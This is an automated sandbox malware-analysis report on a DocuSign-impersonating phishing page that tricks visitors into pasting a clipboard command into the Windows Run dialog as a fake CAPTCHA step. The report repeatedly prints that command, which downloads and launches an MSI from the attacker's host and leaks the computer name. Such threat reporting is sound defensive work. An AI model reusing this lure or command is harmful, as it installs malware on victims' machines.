Edit tour

Windows Analysis Report
https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF

Overview

General Information

Sample URL:https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF
Analysis ID:1645433
Infos:

Detection

Score:64
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Detect drive by download via clipboard copy & paste
AI detected landing page (webpage, office document or email)
HTML page adds supicious text to clipboard
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body with high number of large embedded background images detected
HTML title does not match URL
Invalid T&C link found
Sample execution stops while process was sleeping (likely an evasion)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 1540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 4564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1768,i,13563723301119555575,7756311842140240896,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cmd.exe (PID: 4328 cmdline: cmd /K cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo CAPTCHA Code: 033561 && pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.1022) MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6912 cmdline: cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • curl.exe (PID: 6452 cmdline: curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetFJoe Sandbox AI: Score: 9 Reasons: The brand 'Docusign' is well-known and typically associated with the domain 'docusign.com'., The URL 'account.esign.us.com' does not match the legitimate domain 'docusign.com'., The domain 'esign.us.com' is suspicious as it does not directly relate to 'Docusign' and uses a generic domain structure., The presence of 'account' as a subdomain could be an attempt to mimic legitimate login pages., The use of 'us.com' as a domain extension is unusual for a well-known brand like Docusign, which typically uses '.com'. DOM: 0.0.pages.csv
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetFJoe Sandbox AI: Score: 9 Reasons: The brand 'Docusign' is well-known and typically associated with the domain 'docusign.com'., The URL 'account.esign.us.com' does not match the legitimate domain 'docusign.com'., The domain 'esign.us.com' is suspicious as it does not directly relate to 'Docusign' and uses a generic domain structure., The presence of 'account' as a subdomain could be an attempt to mimic legitimate account-related pages., The use of a reCAPTCHA code input field is common in phishing sites to create a false sense of security. DOM: 0.1.pages.csv
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetFJoe Sandbox AI: Page contains button: 'Submit Verification' Source: '0.1.pages.csv'
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetFHTTP Parser: Number of links: 0
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetFHTTP Parser: Total embedded background img size: 248747
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetFHTTP Parser: Title: Docusign - Verification does not match URL
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetFHTTP Parser: Invalid link: Privacy Policy
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetFHTTP Parser: Invalid link: Terms of Service
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetFHTTP Parser: Invalid link: Privacy Policy
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetFHTTP Parser: Invalid link: Terms of Service
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetFHTTP Parser: No <meta name="author".. found
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetFHTTP Parser: No <meta name="author".. found
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetFHTTP Parser: No <meta name="copyright".. found
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetFHTTP Parser: No <meta name="copyright".. found
Source: global trafficHTTP traffic detected: GET /documentWizard.html?Uv=4WaUN2Pkric74yNetF HTTP/1.1Host: account.esign.us.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/sweetalert2@11.6.15/dist/sweetalert2.min.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://account.esign.us.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/sweetalert2@11.6.15/dist/sweetalert2.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://account.esign.us.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /intl/en_us/badges/static/images/badges/en_badge_web_generic.png HTTP/1.1Host: play.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CO6MywE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://account.esign.us.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: account.esign.us.com
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: play.google.com
Source: global trafficDNS traffic detected: DNS query: upload.wikimedia.org
Source: global trafficDNS traffic detected: DNS query: google.com
Source: curl.exe, 00000011.00000002.2084776832.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.esign.us.com/user-verify
Source: curl.exe, 00000011.00000002.2084776832.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.esign.us.com/user-verify-Hx-system-id:
Source: curl.exe, 00000011.00000002.2084776832.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.esign.us.com/user-verifys
Source: chromecache_67.3.drString found in binary or memory: https://cdn.jsdelivr.net/npm/sweetalert2
Source: chromecache_67.3.drString found in binary or memory: https://developer.apple.com/assets/elements/badges/download-on-the-app-store.svg
Source: chromecache_67.3.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Inter:wght
Source: chromecache_67.3.drString found in binary or memory: https://fonts.googleapis.com/icon?family=Material
Source: chromecache_63.3.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZ9hiA.woff2)
Source: chromecache_63.3.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZBhiI2B.woff2
Source: chromecache_63.3.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZFhiI2B.woff2
Source: chromecache_63.3.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZJhiI2B.woff2
Source: chromecache_63.3.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZNhiI2B.woff2
Source: chromecache_63.3.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZthiI2B.woff2
Source: chromecache_63.3.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZxhiI2B.woff2
Source: chromecache_62.3.drString found in binary or memory: https://fonts.gstatic.com/s/materialicons/v143/flUhRq6tzZclQEJ-Vdg-IuiaDsNc.woff2)
Source: chromecache_67.3.drString found in binary or memory: https://play.google.com/intl/en_us/badges/static/images/badges/en_badge_web_generic.png
Source: chromecache_67.3.drString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/2/2b/Windows_logo_2012-Black.svg/25px-Windows_l
Source: chromecache_67.3.drString found in binary or memory: https://www.google.com
Source: chromecache_67.3.drString found in binary or memory: https://www.gstatic.com/recaptcha/api2/logo_48.png
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir1540_1298553543Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir1540_1298553543Jump to behavior
Source: classification engineClassification label: mal64.phis.win@29/27@18/7
Source: C:\Windows\SysWOW64\curl.exeFile created: C:\Users\user\verify.msiJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
Source: C:\Windows\SysWOW64\curl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1768,i,13563723301119555575,7756311842140240896,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:3
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF"
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /K cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo CAPTCHA Code: 033561 && pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.1022)
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1768,i,13563723301119555575,7756311842140240896,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:3Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /K cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo CAPTCHA Code: 033561 && pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.1022)Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi Jump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Persistence and Installation Behavior

barindex
Source: Chrome DOM: 0.1OCR Text: Join our live webinar with Deloitte on March 19 to discover how A is revolutionizing agreement management. > Sales 1-877420-2040 Search Support Access Documents Log In docusign Solutions Products Plans & Pricing Contact Sales Resources auy Now Try For Free Enter reCAPTCHA Code Verification Steps: 1. Press + R 2. Press CTRL + V 3. Press ENTER 4. Submit reCAPTCHA result code below Enter reCAPTCHA code Submit Verification
Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo CAPTCHA Code: 033561 && pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: curl.exe, 00000011.00000002.2084776832.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi Jump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -h "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo captcha code: 033561 && pause && rem docusign captcha verification tool (ver. 2025.1022)
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter
3
Browser Extensions
11
Process Injection
11
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System2
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
11
Process Injection
LSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable Media2
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
File Deletion
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1645433 URL: https://account.esign.us.co... Startdate: 21/03/2025 Architecture: WINDOWS Score: 64 24 account.esign.us.com 2->24 34 AI detected phishing page 2->34 36 Detect drive by download via clipboard copy & paste 2->36 38 HTML page adds supicious text to clipboard 2->38 40 AI detected landing page (webpage, office document or email) 2->40 8 chrome.exe 2 2->8         started        10 cmd.exe 1 2->10         started        12 chrome.exe 2->12         started        signatures3 process4 process5 14 chrome.exe 8->14         started        17 cmd.exe 1 10->17         started        19 conhost.exe 10->19         started        dnsIp6 28 account.esign.us.com 44.203.127.19 AMAZON-AESUS United States 14->28 30 upload.wikimedia.org 208.80.154.240 WIKIMEDIAUS United States 14->30 32 6 other IPs or domains 14->32 21 curl.exe 2 17->21         started        process7 dnsIp8 26 127.0.0.1 unknown unknown 21->26

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://account.esign.us.com/user-verify-Hx-system-id:0%Avira URL Cloudsafe
https://account.esign.us.com/user-verifys0%Avira URL Cloudsafe
https://account.esign.us.com/user-verify0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
jsdelivr.map.fastly.net
151.101.193.229
truefalse
    high
    google.com
    142.251.40.238
    truefalse
      high
      play.google.com
      172.217.165.142
      truefalse
        high
        www.google.com
        142.251.40.196
        truefalse
          high
          upload.wikimedia.org
          208.80.154.240
          truefalse
            high
            account.esign.us.com
            44.203.127.19
            truetrue
              unknown
              cdn.jsdelivr.net
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://cdn.jsdelivr.net/npm/sweetalert2@11.6.15/dist/sweetalert2.min.jsfalse
                  high
                  https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetFtrue
                    unknown
                    https://play.google.com/intl/en_us/badges/static/images/badges/en_badge_web_generic.pngfalse
                      high
                      https://cdn.jsdelivr.net/npm/sweetalert2@11.6.15/dist/sweetalert2.min.cssfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.google.comchromecache_67.3.drfalse
                          high
                          https://account.esign.us.com/user-verify-Hx-system-id:curl.exe, 00000011.00000002.2084776832.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://upload.wikimedia.org/wikipedia/commons/thumb/2/2b/Windows_logo_2012-Black.svg/25px-Windows_lchromecache_67.3.drfalse
                            high
                            https://account.esign.us.com/user-verifycurl.exe, 00000011.00000002.2084776832.0000000000CE0000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://account.esign.us.com/user-verifyscurl.exe, 00000011.00000002.2084776832.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://cdn.jsdelivr.net/npm/sweetalert2chromecache_67.3.drfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              151.101.193.229
                              jsdelivr.map.fastly.netUnited States
                              54113FASTLYUSfalse
                              208.80.154.240
                              upload.wikimedia.orgUnited States
                              14907WIKIMEDIAUSfalse
                              44.203.127.19
                              account.esign.us.comUnited States
                              14618AMAZON-AESUStrue
                              142.251.40.142
                              unknownUnited States
                              15169GOOGLEUSfalse
                              142.251.40.196
                              www.google.comUnited States
                              15169GOOGLEUSfalse
                              172.217.165.142
                              play.google.comUnited States
                              15169GOOGLEUSfalse
                              IP
                              127.0.0.1
                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1645433
                              Start date and time:2025-03-21 18:43:21 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 22s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:browseurl.jbs
                              Sample URL:https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:20
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal64.phis.win@29/27@18/7
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, TextInputHost.exe
                              • Excluded IPs from analysis (whitelisted): 142.251.40.131, 142.251.32.110, 142.250.80.110, 172.253.122.84, 142.250.80.78, 142.250.176.206, 142.251.40.106, 142.250.65.195, 17.253.97.202, 17.253.97.204, 142.250.72.99, 142.250.176.195, 17.253.3.139, 17.253.3.134, 199.232.214.172, 142.251.40.238, 142.250.80.42, 142.251.40.138, 172.217.165.138, 142.250.65.170, 142.251.40.234, 142.250.80.106, 142.251.40.202, 142.250.80.74, 142.250.64.106, 142.250.80.10, 142.251.40.170, 142.250.64.74, 142.250.176.202, 142.250.72.106, 142.251.41.10, 142.251.35.174, 142.250.65.238, 142.251.40.206, 199.232.210.172, 142.251.40.195, 142.250.65.163, 184.31.69.3, 192.168.2.6, 20.109.210.53
                              • Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, developer.apple.com, fe3cr.delivery.mp.microsoft.com, developer-cdn.apple.com.akadns.net, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, www.gstatic.com, world-gen.g.aaplimg.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenFile calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF
                              TimeTypeDescription
                              18:44:42ClipboardRun: cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo CAPTCHA Code: 033561 && pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.1022)
                              No context
                              No context
                              No context
                              No context
                              No context
                              Process:C:\Windows\SysWOW64\curl.exe
                              File Type:Composite Document File V2 Document, Can't read SAT
                              Category:dropped
                              Size (bytes):10055680
                              Entropy (8bit):7.99703770777142
                              Encrypted:true
                              SSDEEP:196608:1wCYGozqoC3sktVQC6WGwW3YziyfzrvHWrHMJ/ZnznFE5xlNhsVm:1UDAvtCC6FlByfXvHWEZnzqZ
                              MD5:F35E55AB0B13D00D1237F09D2BC603DD
                              SHA1:D31368479E8E632DA929F2E385B6A31FFFA5B507
                              SHA-256:4DF441E0A284601615217184DC64FCF9427E659F534FFA6228BBBA152CEA4274
                              SHA-512:566B3C3733D396AC572A48A28059CC4FAF6169CBDEF82CA67A6A736C622D3C7988C395610D9CB4B087EB87978250ABA3707F1A0B32C258234E05591B715CA282
                              Malicious:false
                              Reputation:low
                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Web Open Font Format (Version 2), TrueType, length 24368, version 1.0
                              Category:downloaded
                              Size (bytes):24368
                              Entropy (8bit):7.990776494170634
                              Encrypted:true
                              SSDEEP:384:dg3hlifU7dYMasNHvcIxoRqrYcyKRjpt2PJKYytsPLFOYYmHRlkaSsD:YqsdxxhcIxo8rPyKJpt6nyaPwtOR2aVD
                              MD5:42B95430773B4A1DEDFCFDA8C03A1D4B
